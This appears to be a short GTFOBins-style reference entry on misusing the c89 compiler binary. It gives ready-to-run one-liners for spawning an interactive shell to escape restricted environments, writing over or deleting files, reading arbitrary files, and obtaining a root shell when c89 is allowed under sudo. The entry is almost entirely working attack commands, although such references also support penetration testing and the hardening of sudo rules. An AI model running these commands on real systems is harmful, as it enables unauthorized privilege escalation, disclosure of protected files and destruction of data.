It can be used to break out from restricted environments by spawning an interactive system shell.
c89 -wrapper /bin/sh,-s .
It writes data to files, it may be used to do privileged writes or write files outside a restricted file system.
LFILE=file_to_delete
c89 -xc /dev/null -o $LFILE
It reads data from files, it may be used to do privileged reads or disclose files outside a restricted file system.
LFILE=file_to_read
c89 -x c -E "$LFILE"
If the binary is allowed to run as superuser by sudo
, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.
sudo c89 -wrapper /bin/sh,-s .